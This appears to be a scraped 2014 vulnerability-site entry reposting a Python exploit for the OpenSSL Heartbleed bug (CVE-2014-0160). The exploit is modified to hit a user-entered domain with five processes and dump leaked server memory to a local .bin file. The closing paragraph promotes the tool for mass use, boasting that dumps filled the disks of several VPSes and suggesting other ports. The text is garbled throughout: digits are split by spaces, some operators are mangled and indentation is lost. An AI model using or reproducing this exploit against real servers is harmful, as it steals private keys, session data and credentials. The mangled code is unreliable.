openssl multi-threaded multi-domain EXP, support for custom ports, save the binary file to save space-bug warning-the black bar safety net

2014-05-22T00:00:00
ID MYHACK58:62201447398
Type myhack58
Reporter 佚名
Modified 2014-05-22T00:00:00

Description

!/ usr/bin/python

Quick and dirty demonstration of CVE-2 0 1 4-0 1 6 0 by Jared Stafford (jspenguin@jspenguin.org)

The author disclaims copyright to this source code.

Multi process and bin dump version by anthrax@insight-labs.org

import sys import struct import socket import time import select import re from multiprocessing import Process,Lock,Manager

THREADS = 5 lock = Lock()

def h2bin(x): return x. replace(' ', "). replace('\n', "). decode('hex')

hello = h2bin("' 1 6 0 3 0 2 0 0 dc 0 1 0 0 0 0 d8 0 3 0 2 5 3 4 3 5b 9 0 9d 9b 7 2 0b bc 0c bc 2b 9 2 a8 4 8 9 7 cf bd 3 9 0 4 cc 1 6 0a 8 5 0 3 9 0 9f 7 7 0 4 3 3 d4 de 0 0 0 0 6 6 c0 1 4 c0 0a c0 2 2 c0 2 1 0 0 3 9 0 0 3 8 0 0 8 8 0 0 8 7 c0 0f c0 0 5 0 0 3 5 0 0 8 4 c0 1 2 c0 0 8 c0 1c c0 1b 0 0 1 6 0 0 1 3 c0 0d c0 0 3 0 0 0a c0 1 3 c0 0 9 c0 1f c0 1e 0 0 3 3 0 0 3 2 0 0 9a 0 0 9 9 0 0 4 5 0 0 4 4 c0 0e c0 0 4 0 0 2f 0 0 9 6 0 0 4 1 c0 1 1 c0 0 7 c0 0c c0 0 2 0 0 0 5 0 0 0 4 0 0 1 5 0 0 1 2 0 0 0 9 0 0 1 4 0 0 1 1 0 0 0 8 0 0 0 6 0 0 0 3 0 0 ff 0 1 0 0 0 0 4 9 0 0 0b 0 0 0 4 0 3 0 0 0 1 0 2 0 0 0a 0 0 3 4 0 0 3 2 0 0 0e 0 0 0d 0 0 1 9 0 0 0b 0 0 0c 0 0 1 8 0 0 0 9 0 0 0a 0 0 1 6 0 0 1 7 0 0 0 8 0 0 0 6 0 0 0 7 0 0 1 4 0 0 1 5 0 0 0 4 0 0 0 5 0 0 1 2 0 0 1 3 0 0 0 1 0 0 0 2 0 0 0 3 0 0 0f 0 0 1 0 0 0 1 1 0 0 2 3 0 0 0 0 0 0 0f 0 0 0 1 0 1 "')

hb = h2bin("' 1 8 0 3 0 2 0 0 0 3 0 1 4 0 0 0 "')

def hexdump(s): for b in xrange(0, len(s), 6 4): lin = [c for c in s[b : b + 1 6]] hxdat = ' '. join('%02X' % ord(c) for c in lin) pdat = ". join((c if 3 2 <= ord(c) <= 1 2 6 else '.' )for c in lin) print '%04x: %-48s %s ' % (b, hxdat, pdat) print

def hexwrite(s,fn):

lock. acquire() fn. write(s)

print 'data dumped...'

lock. release()

def recvall(s, length, timeout=5): endtime = time. time() + timeout rdata = " remain = length while remain > 0: rtime = endtime - time. time() if rtime < 0: return None r, w, e = select. select([s], [], [], 5) if s in r: try: data = s. recv(remain) except Exception as e: print e pass

EOF?

if not data: return None rdata += data remain -= len(data) return rdata

def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct. unpack('>BHH', hdr) pay = recvall(s, ln, 1 0) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None

print '... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))

return typ, ver, pay

def hit_hb(s,fn): s. send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False

if typ == 2 of 4:

print 'Received heartbeat response:'

hexwrite(pay,fn) if len(pay) < 3: print 'Server processed malformed heartbeat, but did not return any extra data.' return True

if typ == 2 1:

print 'Received alert:'

hexdump(pay) print 'Server returned error, likely not vulnerable' return False

def fuckit(domain,port,fn): while True: try: s = socket. socket(socket. AF_INET, socket. SOCK_STREAM)

print 'Connecting...'

sys. stdout. flush()

s. connect((domain, port))#print 'Sending Client Hello...'

sys. stdout. flush()

s. send(hello)

print 'Waiting for Server Hello...'

sys. stdout. flush()

while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return

Look for server hello done message.

if typ == 2 2 and ord(pay[0]) == 0x0E: break

print 'Sending heartbeat request...'

sys. stdout. flush()

s. send(hb)

hit_hb(s,fn) s. close() except Exception as e: print e break

def main(): while True: in data=raw_input("Enter domain name and port, example: google. com:4 4 3 : ") print in data domain=in data. split(':')[0] try: port=int(in data. split(':')[1]) except: port=4 4 3 if len(domain)<5: print 'wrong domain' continue print 'fucking '+domain+' @ port '+str(port)+'...' fn=open(domain+'. bin','ab') for j in xrange(THREADS): t = Process(target=fuckit,args=(domain,port,fn)) t. daemon=True t. start()

if name == 'main': main()

Very simple to use, it is recommended in the linux running under windows there are compatibility issues. By default each ip open 5 threads. Yesterday our friends with the 1 0 more vps hard disk ran full....... By the way, you can try it for 4 6 for 5, 9 9 5, 8 4 4 3 like the port, there are surprises.